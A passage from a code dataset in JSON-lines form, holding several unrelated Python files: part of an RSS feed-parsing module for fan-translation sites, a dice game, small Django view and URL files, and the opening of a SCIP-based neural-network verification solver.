pfuncs_a_g.extractDaupao,\n\t\t\t\t'Deep Azure Sky' : pfuncs_a_g.extractDeepAzureSky,\n\t\t\t\t'Demon Scorpion Translations' : pfuncs_a_g.extractDemonScorpionTranslations,\n\t\t\t\t'Dwrf TL' : pfuncs_a_g.extractDwrfTL,\n\t\t\t\t'ExMachina.Asia' : pfuncs_a_g.extractExMachinaAsia,\n\t\t\t\t'Fake Fruits Translations' : pfuncs_a_g.extractFakeFruitsTranslations,\n\t\t\t\t'fantasy-books.live' : pfuncs_a_g.extractFantasyBooksLive,\n\t\t\t\t'For Kalimdor!' : pfuncs_a_g.extractForKalimdor,\n\t\t\t\t'Forthemoney Translations' : pfuncs_a_g.extractForthemoneyTranslations,\n\t\t\t\t'Girly Novels' : pfuncs_a_g.extractGirlyNovels,\n\t\t\t\t'Heavens Justice Translation' : pfuncs_h_n.extractHeavensJusticeTranslation,\n\t\t\t\t'I Ballistic Bunnies' : pfuncs_h_n.extractIBallisticBunnies,\n\t\t\t\t'Idyllic Translations' : pfuncs_h_n.extractIdyllicTranslations,\n\t\t\t\t'Incarneous' : pfuncs_h_n.extractIncarneous,\n\t\t\t\t'Jen Press Translation' : pfuncs_h_n.extractJenPressTranslation,\n\t\t\t\t'JeruTz\\'s Blog' : pfuncs_h_n.extractJeruTzsBlog,\n\t\t\t\t'JuJu Translation' : pfuncs_h_n.extractJuJuTranslation,\n\t\t\t\t'Kaguro Jp' : pfuncs_h_n.extractKaguroJp,\n\t\t\t\t'Kai\\'s Translations' : pfuncs_h_n.extractKaisTranslations,\n\t\t\t\t'Kencephalon Translations' : pfuncs_h_n.extractKencephalonTranslations,\n\t\t\t\t'Kirihara Maya' : pfuncs_h_n.extractKiriharaMaya,\n\t\t\t\t'Knight Fantastic Night Translations' : pfuncs_h_n.extractKnightFantasticNightTranslations,\n\t\t\t\t'Kudarajin' : pfuncs_h_n.extractKudarajin,\n\t\t\t\t'L3D' : pfuncs_h_n.extractL3D,\n\t\t\t\t'Laki\\'s Laboratory' : pfuncs_h_n.extractLakisLaboratory,\n\t\t\t\t'Land of Light Novels' : pfuncs_h_n.extractLandofLightNovels,\n\t\t\t\t'Leecher Vamparis Translations' : pfuncs_h_n.extractLeecherVamparisTranslations,\n\t\t\t\t'Legend of the Evil God' : pfuncs_h_n.extractLegendoftheEvilGod,\n\t\t\t\t'Legions Realm' : pfuncs_h_n.extractLegionsRealm,\n\t\t\t\t'Light Novels World' : pfuncs_h_n.extractLightNovelsWorld,\n\t\t\t\t'Loathsome Translations' : pfuncs_h_n.extractLoathsomeTranslations,\n\t\t\t\t'Luminstia' : pfuncs_h_n.extractLuminstia,\n\t\t\t\t'Mage Life' : pfuncs_h_n.extractMageLife,\n\t\t\t\t'Magictrans' : pfuncs_h_n.extractMagictrans,\n\t\t\t\t'Martial Dao' : pfuncs_h_n.extractMartialDao,\n\t\t\t\t'Misty Cloud Translations' : pfuncs_h_n.extractMistyCloudTranslations,\n\t\t\t\t'Mountain of Pigeons Translations' : pfuncs_h_n.extractMountainofPigeonsTranslations,\n\t\t\t\t'MT Novels' : pfuncs_h_n.extractMTNovels,\n\t\t\t\t'MyEngTranslation' : pfuncs_h_n.extractMyEngTranslation,\n\t\t\t\t'Nadenadeshitai' : pfuncs_h_n.extractNadenadeshitai,\n\t\t\t\t'Nex Serus' : pfuncs_h_n.extractNexSerus,\n\t\t\t\t'Pengu Taichou' : pfuncs_o_u.extractPenguTaichou,\n\t\t\t\t'Polar Bear Catcher' : pfuncs_o_u.extractPolarBearCatcher,\n\t\t\t\t'Poor Quality Translations' : pfuncs_o_u.extractPoorQualityTranslations,\n\t\t\t\t'Pumlated' : pfuncs_o_u.extractPumlated,\n\t\t\t\t'Rainbow Turtle Translations' : pfuncs_o_u.extractRainbowTurtleTranslations,\n\t\t\t\t'Ries Translations' : pfuncs_o_u.extractRiesTranslations,\n\t\t\t\t'Rinvelt House' : pfuncs_o_u.extractRinveltHouse,\n\t\t\t\t'Rogue Apple' : pfuncs_o_u.extractRogueApple,\n\t\t\t\t'Rotten Translations' : pfuncs_o_u.extractRottenTranslations,\n\t\t\t\t'Sabishi desu!!' : pfuncs_o_u.extractSabishiDesu,\n\t\t\t\t'sabishidesu.tk' : pfuncs_o_u.extractSabishiDesu,\n\t\t\t\t'Sekai no Kuroba' : pfuncs_o_u.extractSekainoKuroba,\n\t\t\t\t'Shalvation Translations' : pfuncs_o_u.extractShalvationTranslations,\n\t\t\t\t'Shameless Onii-san' : pfuncs_o_u.extractShamelessOniisan,\n\t\t\t\t'Shine Translation' : pfuncs_o_u.extractShineTranslation,\n\t\t\t\t'Shouldnt be here blog' : pfuncs_o_u.extractShouldntbehereblog,\n\t\t\t\t'Shova Translations' : pfuncs_o_u.extractShovaTranslations,\n\t\t\t\t'Silkpants Entente' : pfuncs_o_u.extractSilkpantsEntente,\n\t\t\t\t'SnowTime Translations' : pfuncs_o_u.extractSnowTimeTranslations,\n\t\t\t\t'Steady Translation' : pfuncs_o_u.extractSteadyTranslation,\n\t\t\t\t'SunnyTranslations' : pfuncs_o_u.extractSunnyTranslations,\n\t\t\t\t'T&Q' : pfuncs_o_u.extractTandQ,\n\t\t\t\t'Tequila Mockingbard' : pfuncs_o_u.extractTequilaMockingbard,\n\t\t\t\t'The Boy Who Couldn\\'t Be A Hero' : pfuncs_o_u.extractTheBoyWhoCouldntBeAHero,\n\t\t\t\t'thepaperfictions.wordpress.com' : pfuncs_o_u.extractThePaperFictions,\n\t\t\t\t'Tokyo ESP Scans' : pfuncs_o_u.extractTokyoESPScans,\n\t\t\t\t'Unique Books' : pfuncs_o_u.extractUniqueBooks,\n\t\t\t\t'Warrior Writing' : pfuncs_v_other.extractWarriorWriting,\n\t\t\t\t'Wiggly Translation' : pfuncs_v_other.extractWigglyTranslation,\n\t\t\t\t'World of Hope' : pfuncs_v_other.extractWorldofHope,\n\t\t\t\t'World Turtle Translations' : pfuncs_v_other.extractWorldTurtleTranslations,\n\t\t\t\t'Yasashi Honyaku' : pfuncs_v_other.extractYasashiHonyaku,\n\t\t\t\t'Yeagdrasil' : pfuncs_v_other.extractYeagdrasil,\n\t\t\t\t'Your Majesty Please Calm Down' : pfuncs_v_other.extractYourMajestyPleaseCalmDown,\n\t\t\t\t'『書櫃』' : pfuncs_v_other.extract書櫃,\n\t\t\t\t'閒人 • O N L I N E' : pfuncs_v_other.extract閒人ONLINE,\n\n\n\n\n\n\n\n\n\n\n\t\t\t\t# Broken\n\t\t\t\t'Require: Cookie' : pfuncs_stub.extractNop,\n\n\n\t\t\t\t'Blue Phoenix' : pfuncs_a_g.extractBluePhoenix,\n\t\t\t\t'Demon Translations' : pfuncs_a_g.extractDemonTranslations,\n\t\t\t\t'Fantasy novels' : pfuncs_a_g.extractFantasyNovels,\n\t\t\t\t'HalfElementMaster Translation' : pfuncs_h_n.extractHalfElementMasterTranslation,\n\t\t\t\t'Love me if you dare' : pfuncs_h_n.extractLoveMeIfYouDare,\n\t\t\t\t'Mineral Water Translation' : pfuncs_h_n.extractMineralWaterTranslation,\n\t\t\t\t'Rinkage Translation' : pfuncs_o_u.extractRinkageTranslation,\n\t\t\t\t'Selkin Novel' : pfuncs_o_u.extractSelkinNovel,\n\t\t\t\t'Startling Surprises at Every Step' : pfuncs_o_u.extractStartlingSurprisesAtEveryStep,\n\t\t\t\t'Wish Upon A Hope' : pfuncs_v_other.extractWishUponAHope,\n\n\n\t\t}\n\n\n\n\n\t\t# ('Have Func', False), ('SourceName', 'sparklingdawnlights.blogspot.com'),\n\n\t\t# ('Have Func', False), ('SourceName', 'Zeonic'),\n\t\t# ('Have Func', False), ('SourceName', '「\\u3000」'),\n\t\t# ('Have Func', False), ('SourceName', '天才創造すなわち百合'),\n\n\t\t# 'n00btranslations.wordpress.com' : pfuncs.extractN00btranslations.wordpress.com,\n\t\t# 'omatranslations.wordpress.com' : pfuncs.extractOmatranslations.wordpress.com,\n\t\t# 'soaringtranslations.wordpress.com' : pfuncs.extractSoaringtranslations.wordpress.com,\n\t\t# 'solitarytranslation.wordpress.com' : pfuncs.extractSolitarytranslation.wordpress.com,\n\t\t# 'walkthejianghu.wordpress.com' : pfuncs.extractWalkthejianghu.wordpress.com,\n\n\n\t\tif item['srcname'] in funcMap:\n\t\t\tret = funcMap[item['srcname']](item)\n\t\telse:\n\t\t\tprint(\"No filter found for '%s'?\" % item['srcname'])\n\n\t\t# NanoDesu is annoying and makes their releases basically impossible to parse. FFFUUUUUu\n\t\tif \"(NanoDesu)\" in item['srcname'] and not ret:\n\t\t\treturn False\n\n\t\tif ret is None:\n\t\t\treturn False\n\n\t\tbad_starts = [\n\t\t\t('FeedProxy', 'Comment on '),\n\t\t\t(\"Krytyk's Translations\", 'By: '),\n\t\t\t('Prince Revolution!', 'By: '),\n\t\t\t('Blazing Translations', 'By: '),\n\t\t\t('Blazing Translations', 'Comment on '),\n\t\t\t('Aran Translations', 'Comment on '),\n\n\t\t]\n\n\t\tif (\n\t\t\t\t(flags.RSS_DEBUG or self.dbg_print) and\n\t\t\t\tself.write_debug and\n\t\t\t\tret is False and\n\t\t\t\tnot \"teaser\" in item['title'].lower() and\n\t\t\t\tnot \"Preview\" in item['tags']\n\t\t\t):\n\t\t\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\t\t\tif vol or chp or frag and not flags.RSS_DEBUG:\n\n\t\t\t\tif not any([(item['title'].startswith(bad) and item['srcname'] == src) for src, bad in bad_starts]):\n\t\t\t\t\twith open('rss_filter_misses-1.json', \"a\") as fp:\n\n\t\t\t\t\t\twrite_items = {\n\t\t\t\t\t\t\t\"SourceName\" : item['srcname'],\n\t\t\t\t\t\t\t\"Title\" : item['title'],\n\t\t\t\t\t\t\t\"Tags\" : list(item['tags']),\n\t\t\t\t\t\t\t\"Vol\" : False if not vol else vol,\n\t\t\t\t\t\t\t\"Chp\" : False if not chp else chp,\n\t\t\t\t\t\t\t\"Frag\" : False if not frag else frag,\n\t\t\t\t\t\t\t\"Postfix\" : postfix,\n\t\t\t\t\t\t\t\"Feed URL\" : item['linkUrl'],\n\t\t\t\t\t\t\t\"GUID\" : item['guid'],\n\t\t\t\t\t\t\t\"Have Func\" : item['srcname'] in funcMap,\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\t# fp.write(\"\\n==============================\\n\")\n\t\t\t\t\t\t# fp.write(\"Feed URL: '%s', guid: '%s'\" % (item['linkUrl'], item['guid']))\n\t\t\t\t\t\t# fp.write(\"'%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'\\n\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix, item['linkUrl']))\n\n\t\t\t\t\t\tfp.write(\"%s\" % (json.dumps(write_items, )))\n\t\t\t\t\t\tfp.write(\"\\n\")\n\n\t\tvol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])\n\t\tif self.dbg_print or flags.RSS_DEBUG:\n\t\t\t# False means not caught. None means intentionally ignored.\n\n\t\t\tif (\n\t\t\t\t\tret is False and\n\t\t\t\t\t(vol or chp or frag) and\n\t\t\t\t\tnot \"teaser\" in item['title'].lower()\n\t\t\t\t):\n\t\t\t\tprint(\"Missed:\")\n\t\t\t\tprint(\"\tSource: '%s'\" % (item['srcname'], ))\n\t\t\t\tprint(\"\tTitle: '%s'\" % (item['title'], ))\n\t\t\t\tprint(\"\tTags: '%s'\" % (item['tags'], ))\n\t\t\t\tprint(\"\tVol %s, chp %s, fragment %s, postfix '%s'\" % (vol, chp, frag, postfix))\n\t\t\t\t# print(\"Missed: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix))\n\t\t\telif ret:\n\t\t\t\tpass\n\t\t\t\t# print(\"OK! '%s', V:'%s', C:'%s', '%s', '%s', '%s'\" % (ret['srcname'], ret['vol'], ret['chp'], ret['postfix'], ret['series'], item['title']))\n\t\t\telse:\n\t\t\t\tpass\n\t\t\t\t# print(\"Wat: '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'\" % (item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix, item['linkUrl']))\n\n\t\t\tif flags.RSS_DEBUG:\n\t\t\t\tret = False\n\n\t\t# Only return a value if we've actually found a chapter/vol\n\t\tif ret and not (ret['vol'] or ret['chp'] or ret['postfix']):\n\t\t\tself.log.info(\"Skipping item due to no chapter/vol/postfix: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\", item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix)\n\t\t\tret = False\n\n\t\t# Do not trigger if there is \"preview\" in the title.\n\t\tif 'preview' in item['title'].lower():\n\t\t\tself.log.info(\"Skipping item due to preview string: '%s', '%s', '%s', '%s', '%s', '%s', '%s'\", item['srcname'], item['title'], item['tags'], vol, chp, frag, postfix)\n\t\t\tret = False\n\t\tif ret:\n\t\t\tassert 'tl_type' in ret\n\n\n\n\t\treturn ret\n\n\n\tdef getProcessedReleaseInfo(self, feedDat):\n\n\t\tif any([item in feedDat['linkUrl'] for item in skip_filter]):\n\t\t\tprint(\"Skipping!\")\n\t\t\treturn\n\n\n\t\trelease = self.dispatchRelease(feedDat)\n\n\t\tif release:\n\t\t\tret = {\n\t\t\t\t'type' : 'parsed-release',\n\t\t\t\t'data' : release\n\t\t\t}\n\t\t\treturn json.dumps(ret)\n\t\treturn False\n\n\n\tdef getRawFeedMessage(self, feedDat):\n\n\t\tfeedDat = feedDat.copy()\n\n\t\t# remove the contents item, since it can be\n\t\t# quite large, and is not used.\n\t\tfeedDat.pop('contents')\n\t\tret = {\n\t\t\t'type' : 'raw-feed',\n\t\t\t'data' : feedDat\n\t\t}\n\t\ttry:\n\t\t\treturn json.dumps(ret)\n\t\texcept TypeError:\n\t\t\treturn None\n\n\t# Manual patches for dealing with a few broken feeds.\n\tdef checkIgnore(self, feedDat):\n\n\t\t# Japtem seems to put their comments in their main feed, for no good reason.\n\t\tif feedDat['srcname'] == \"Japtem\" and feedDat['title'].startswith(\"By: \"):\n\t\t\treturn True\n\t\tif feedDat['srcname'] == \"Zeonic\" and feedDat['title'].startswith(\"By: \"):\n\t\t\treturn True\n\t\tif feedDat['srcname'] == 'Sora Translations' and feedDat['title'].startswith(\"Comment on\"):\n\t\t\treturn True\n\n\n\t\treturn False\n\n\tdef processFeedData(self, feedDat, tx_raw=True, tx_parse=True):\n\n\t\tif any([item in feedDat['linkUrl'] for item in skip_filter]):\n\t\t\tprint(\"LinkURL '%s' contains a filtered string. Not fetching!\" % feedDat['linkUrl'])\n\t\t\treturn\n\n\n\t\tnetloc = urllib.parse.urlparse(feedDat['linkUrl']).netloc\n\n\t\tnicename = feedNameLut.getNiceName(feedDat['linkUrl'])\n\t\tif not nicename:\n\t\t\tnicename = netloc\n\t\tfeedDat['srcname'] = nicename\n\n\t\tif self.checkIgnore(feedDat):\n\t\t\treturn\n\n\t\t# print(\"ProcessFeedData! \", netloc)\n\n\t\t# A bunch of crap is aggregated through the \"feedproxy.google.com\" netloc.\n\t\tif not WebMirror.rules.netloc_send_feed(netloc) and not \"feedproxy.google.com\" in netloc:\n\t\t\tprint(\"Not sending data for netloc: \", netloc)\n\t\t\treturn\n\n\t\ttry:\n\t\t\tnew = self.getProcessedReleaseInfo(feedDat)\n\t\texcept AssertionError:\n\t\t\tself.log.error(\"Exception when processing release!\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line.rstrip())\n\n\t\t\treturn\n\n\t\tif tx_parse:\n\t\t\tif new:\n\t\t\t\tself.amqp_put_item(new)\n\n\n\t\traw = self.getRawFeedMessage(feedDat)\n\t\tif tx_raw:\n\t\t\tif raw:\n\t\t\t\tself.amqp_put_item(raw)\n","sub_path":"WebMirror/OutputFilters/rss/FeedDataParser.py","file_name":"FeedDataParser.py","file_ext":"py","file_size_in_byte":86086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506327436","text":"from random import randint\n\ndef getdicevalue():\n # to get the value obtained on rolling the dice\n return randint(1,6) \n\nturns_taken = 1\ntotal_score = 0\nturn_score = 0\n\nprint(\"TURN 1\")\n\nwhile total_score<20:\n option_taken = input(\"Roll or hold? (r/h):\")\n\n if(option_taken=='r'):\n value_obtained = getdicevalue()\n print(\"Die: \",value_obtained)\n if(value_obtained==1):\n turn_score = 0\n turns_taken += 1\n print(\"Turn over. No score.\\n\\nTURN\",turns_taken)\n else:\n turn_score += value_obtained\n \n else:\n total_score += turn_score\n if(turn_score>20 or total_score>20):\n break\n print(\"Score for turn:\",turn_score,\"\\nTotal score:\",total_score)\n turns_taken += 1\n print(\"\\nTURN\",turns_taken)\n turn_score = 0\n \n if(turn_score>20 or total_score>20):\n break\n\n\nprint(\"You finished in\",turns_taken,\"turn/s!\\nGame Over!\")\n\n\n","sub_path":"Session01/pig.py","file_name":"pig.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11262386","text":"from django.shortcuts import render\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Create your views here.\n\ndef distance(request):\n OLat = -4.252606\n OLong = 15.232513\n DLat = -4.153139\n DLong = 15.270116\n p1 = [OLat, OLong]\n p2 = [DLat, DLong]\n # distance = math.sqrt( ((p1[0]-p2[0])**2)+((p1[1]-p2[1])**2) )\n \n R = 6373.0\n\n lat1 = radians(OLat)\n lon1 = radians(OLong)\n lat2 = radians(DLat)\n lon2 = radians(DLong)\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n \n\n return render(request, 'index.html', locals())\n","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"523087957","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.web_index, name='index'),\n url(r'^main$', views.web_main, name='main'),\n url(r'^upload$', views.web_upload_file, name='upload'),\n url(r'^status$', views.web_status, name='status'),\n url(r'^check$', views.web_check, name='check'),\n url(r'^collocations$', views.web_collocations, name='collocations')\n]\n","sub_path":"src/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"379302024","text":"from pyscipopt import Model, quicksum, SCIP_PROPTIMING, SCIP_PRESOLTIMING, SCIP_EVENTTYPE, SCIP_HEURTIMING\nimport networkx as nx\nfrom collections import OrderedDict\nfrom relu_branching import ReluBranching\nfrom domain_branching import DomainBranching\nfrom sampling_heuristic import SamplingHeuristic\nfrom utils import bfs_dist\nfrom lb_event import LbChangeEvent\nfrom dualbound_event import DualBoundEvent\nimport torch.nn\nfrom compute_bounds import BoundComp\nfrom collections import namedtuple\nfrom relu_sepa import ReluSepa\n\n\nclass MIPwithBounds:\n \"\"\"Base class of our solver implementation. Contains most data structures and is used to include the\n different components such as separators, branching rules, propagators. \"\"\"\n \n def __init__(self, filepath, eps):\n self.model = Model(\"\")\n self.vars = {}\n self.eps = eps\n self.filepath = filepath\n self.graph = nx.DiGraph()\n self.relu_nodes = {}\n self.relu_in_nodes = {}\n self.fixed_positive = {}\n self.fixed_negative = {}\n self.relu_cons = {}\n self.max_pool_nodes = {}\n self.linear_nodes = {}\n self.input_nodes = {}\n self.binary_variables = {}\n self.nodes_sorted = []\n self.layers = [] # list of sets, each set represents one layer, sets contain variable names (str)\n self.node_position_pytorch = {} # maps neuron names to layer number and index in layer in the pytorch model\n # values are tuples of ints (layer, )\n self.delete_cons = []\n self.output_cons = []\n self.output_variables = {} # dict of those variable names, which are introduced for the optimization mode,\n # except self.objective_variable\n self.output_variables_binary = [] # list of the binary vars for the output, these vars are ALSO in self.binary_vars\n self.verify_or_constraints = False\n self.objective_variable = None\n self.nodes_by_branch_prio = {} # dict {scip_node_number: possible branch Relus}\n self.pytorch_model = None\n self.dualbound_hdlr_feas = None\n self.dualbound_hdlr_infeas = None\n self.local_search_hdlr = None\n self.debug_bound_hdlr = None\n self.bound_comp = None\n\n\n def add_cons_relu_linear(self, x, y):\n \"\"\"Add linear approximation of a ReLU constraint as in Ehlers (2017).\n\n Args:\n x: input variable\n y: output variabe, lower bound of this variable should be 0\n lb: float, lower bound\n ub: float, upper bound\n \"\"\"\n\n self.model.addCons(y >= x)\n ub = x.getUbGlobal()\n lb = x.getLbGlobal()\n factor = ub / (ub - lb)\n if lb <= 0 and ub >= 0:\n self.delete_cons.append(self.model.addCons(y + lb * factor <= x * factor))\n\n\n def add_cons_maxpool_linear(self, X, y, lbs, name):\n \"\"\"Add linear approximation of a ReLU constraint as in Ehlers (2017).\n\n Args:\n X: list of input variables\n y: output variable, lower bound should be -inf\n lbs: list of float, lower bounds of the input variables\n \"\"\"\n\n self.delete_cons.append(self.model.addCons(quicksum(_x for _x in X) >= y + sum(lbs) - max(lbs),\n name=name + \"_lin_approx\"))\n for _x in X:\n self.model.addCons(y >= _x, name=name + \"_lb\")\n\n \n \n def add_cons_maxpool(self, X, y, M, name, use_bound_disj=False, use_mip=True):\n \"\"\"Add a max pool constraint to self.model, i.e. constraint y = max(X)\n \n Args:\n self.model: instance of pyscipopt self.model\n X: list of input variables\n y: output variable, lower bound should be -inf (unless all inputs are >= 0)\n M: upper bound on all input variables\n \"\"\"\n \n if use_bound_disj:\n num = len(X)\n a = [self.model.addVar(lb=None) for _ in range(num)]\n for _a, _x in zip(a, X):\n self.model.addCons(_a == _x - y)\n self.model.addCons(y >= _x)\n \n self.model.addConsBoundDisjunction(a, [\"lb\" for _ in range(num)], [0 for _ in range(num)])\n\n if use_mip:\n assert name\n print(\"add maxpool\", X, y, M)\n d_vars = []\n for i, _x in enumerate(X):\n self.model.addCons(y >= _x, name=name + \"_lb_\" + _x.name)\n _d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + name + \"_\" + _x.name)\n self.model.addCons(y <= _x + (M - _x.getLbGlobal()) * (1 - _d), name=name + \"_bin_ub_\" + _x.name)\n d_vars.append(_d)\n self.binary_variables[\"bin_\" + name + \"_\" + _x.name] = _d\n self.output_variables_binary.append(_d)\n\n self.model.addCons(1 == quicksum(_d for _d in d_vars), name=name + \"_sum\")\n\n\n\n def compute_linear_bounds(self, variables, coefficients, local=False):\n \"\"\"Copmute the upper and lower bound before the ReLU application to the given variables with the\n corresponding coefficients. If lower bound >= 0 or upper bound <= 0, then the phase of the ReLU\n can be fixed.\n\n Args:\n variables: list of str, containing the names of the variables\n coefficients: list of float coefficients\n local: bool, if True local bounds are used, otherwise global bounds\n\n Returns:\n tuple: (lower bound, upper bound)\n \"\"\"\n\n assert len(variables) == len(coefficients)\n\n lb, ub = 0, 0\n for v, c in zip(variables, coefficients):\n v = self.vars[v]\n if local:\n current_lb = v.getLbLocal()\n current_ub = v.getUbLocal()\n else:\n current_lb = v.getLbGlobal()\n current_ub = v.getUbGlobal()\n\n if c > 0:\n ub += current_ub * c\n lb += current_lb * c\n elif c < 0:\n ub += current_lb * c\n lb += current_ub * c\n\n\n return lb, ub\n\n\n def quicksum_coeff_var(self, elements):\n return quicksum(c * v for v, c in zip(*self.get_vars_and_coefficients(elements)))\n\n def quicksum_from_var_names(self, variable_names, coeffs):\n return quicksum(c * self.vars[v] for v, c in zip(*(variable_names, coeffs)))\n\n def get_vars_and_coefficients(self, elements, start=3, str_only=False):\n \"\"\"Use a list which comes from line.split() to create lists of float coefficients and SCIP variables.\"\"\"\n if str_only:\n return [var for var in elements[start + 1::2]], [float(coeff) for coeff in elements[start::2]]\n else:\n return [self.vars[var] for var in elements[start + 1::2]], [float(coeff) for coeff in elements[start::2]]\n\n\n def read_file_into_graph(self):\n \"\"\"Read the input file and add all neurons to self.graph. Futhermore, the input constraints are added\n to self.model and self.output_cons is filled.\"\"\"\n\n assert_or = False\n assert_and = False\n input_bounds = {}\n input_elements = []\n\n with open(self.filepath, \"r\") as f:\n for line in f:\n if line.startswith(\"#\"):\n continue\n elements = line.split()\n if elements[0] == \"Input\":\n input_bounds[elements[1]] = {\"lb\": None, \"ub\": None}\n self.graph.add_node(elements[1], node_type=\"input\")\n\n if elements[0] == \"ReLU\":\n\n relu_in_name = elements[1] + \"_in\"\n relu_out_name = elements[1]\n bias = float(elements[2])\n variables, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n\n relu_entry = namedtuple(\"ReLU\", [\"relu_in_name\", \"relu_out_name\", \"bias\", \"variables\", \"coeffs\"])\n self.relu_nodes[elements[1]] = relu_entry(relu_in_name, relu_out_name, bias, variables, coeffs)\n # relu_in node is created and added to self.relu_in_nodes later, other variables also created later\n\n self.graph.add_node(relu_in_name, node_type=\"relu_in\", bias=bias)\n self.graph.add_node(relu_out_name, node_type=\"relu_out\")\n self.graph.add_edge(relu_in_name, relu_out_name)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v, relu_in_name, weight=w)\n\n\n if elements[0] == \"MaxPool\":\n\n self.max_pool_nodes[elements[1]] = elements[2:]\n self.graph.add_node(elements[1], node_type=\"max_pool\")\n self.graph.add_edges_from(((v, elements[1]) for v in elements[2:]), weight=1)\n\n\n if elements[0] == \"Linear\":\n variables, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n bias = float(elements[2])\n self.linear_nodes[elements[1]] = (bias, variables, coeffs)\n\n #self.graph.add_edges_from((v.name, linear.name) for v in variables)\n self.graph.add_node(elements[1], node_type=\"linear\", bias=bias)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v, elements[1], weight=w)\n\n\n if elements[0] == \"Assert\":\n input_elements.append(elements)\n\n # explicit bounds for input neurons\n if len(elements) == 5 and elements[-1] in input_bounds:\n if elements[1] == \"<=\":\n new_lb = float(elements[2]) / float(elements[3])\n if input_bounds[elements[-1]][\"lb\"] is None or input_bounds[elements[-1]][\"lb\"] < new_lb:\n input_bounds[elements[-1]][\"lb\"] = new_lb\n\n elif elements[1] == \">=\":\n new_ub = float(elements[2]) / float(elements[3])\n if input_bounds[elements[-1]][\"ub\"] is None or input_bounds[elements[-1]][\"ub\"] > new_ub:\n input_bounds[elements[-1]][\"ub\"] = new_ub\n\n if elements[0] == \"AssertOut\":\n assert elements[1] in [\"<=\", \">=\"] and not assert_or\n assert_and = True\n cons = namedtuple(\"output_cons\", [\"lhs\", \"operator\", \"elements\"])\n self.output_cons.append(cons(float(elements[2]), True if elements[1] == \">=\" else False, elements))\n #print(\"assertout\", elements)\n\n if elements[0] == \"AssertOr\":\n # assertOr properties are basically the same as AND, just the \"imaginary\" operator is turned around\n # we assume that all subsequent ORs in the file form one disjunction\n assert elements[1] in [\"<=\", \">=\"] and not assert_and\n assert_or = True\n cons = namedtuple(\"output_cons\", [\"lhs\", \"operator\", \"elements\"])\n self.output_cons.append(cons(float(elements[2]), False if elements[1] == \">=\" else True, elements))\n\n for var_name, bounds in input_bounds.items():\n self.vars[var_name] = self.model.addVar(name=var_name, lb=bounds[\"lb\"], ub=bounds[\"ub\"])\n self.input_nodes[var_name] = self.vars[var_name]\n\n for assert_input_count, elements in enumerate(input_elements):\n if elements[1] == \"<=\":\n self.model.addCons(float(elements[2]) <= self.quicksum_coeff_var(elements),\n name=\"input_cons_\" + str(assert_input_count))\n elif elements[1] == \">=\":\n self.model.addCons(float(elements[2]) >= self.quicksum_coeff_var(elements),\n name=\"input_cons_\" + str(assert_input_count))\n else:\n raise NotImplementedError(\"This property cannot be verified: \" + elements[1])\n\n self.model.hideOutput()\n for var_name, bounds in input_bounds.items():\n if bounds[\"lb\"] is None:\n self.model.setObjective(self.vars[var_name])\n self.model.optimize()\n if self.model.getStatus() != \"optimal\":\n raise ValueError(\"LP lower bound of input cannot be solved to optimality\")\n else:\n bound = self.model.getDualbound()\n self.model.freeTransform()\n self.model.chgVarLbGlobal(self.vars[var_name], bound - 10 * self.eps)\n if bounds[\"ub\"] is None:\n self.model.setObjective(self.vars[var_name], sense=\"maximize\")\n self.model.optimize()\n if self.model.getStatus() != \"optimal\":\n raise ValueError(\"LP upper bound of input cannot be solved to optimality\")\n else:\n bound = self.model.getDualbound()\n self.model.freeTransform()\n self.model.chgVarUbGlobal(self.vars[var_name], bound + 10 * self.eps)\n\n self.model.setObjective(0.0)\n\n self.model.hideOutput(quiet=False)\n\n return self.model, self.vars\n\n\n def add_further_constraints(self, linear_model=False, optimize_nodes=False, opt_mode=False, use_symbolic=False,\n bfs_from_all_inputs=False):\n \"\"\"This methods adds all variables and also fills self.nodes_sorted\n\n Args:\n linear_model: bool, if True add only linear approximation constraints instead of \"real\" constraints\n optimize_nodes: bool, should nodes be optimized (implies solving MIPs/LPs depending on linear_model=False/True)\n opt_mode: bool, use the optimization mode of Bunel et al. or not?\n use_symbolic: bool, use the symbolic bound computation of Wang et al. ?\n bfs_from_all_inputs: bool, should a Breadth first search be performed from all inputs rather than just one?\n This is needed, if some input neurons are not connected to all neurons in the\n next layer, or there are layers which are not fully connected\n \"\"\"\n\n self.bound_comp = BoundComp(self) # must be called after self.build_model() to have input nodes available\n\n if optimize_nodes:\n self.model.setRealParam(\"limits/time\", 3)\n self.model.hideOutput()\n\n self.nodes_sorted = list(nx.topological_sort(self.graph))\n\n if bfs_from_all_inputs: # this is required if not all neurons in the NN can be reached from every input neuron\n for input_node in self.input_nodes:\n for node, dist in bfs_dist(self.graph, input_node).items():\n if dist >= len(self.layers):\n self.layers.append(set())\n self.layers[dist].add(node)\n else:\n for node, dist in 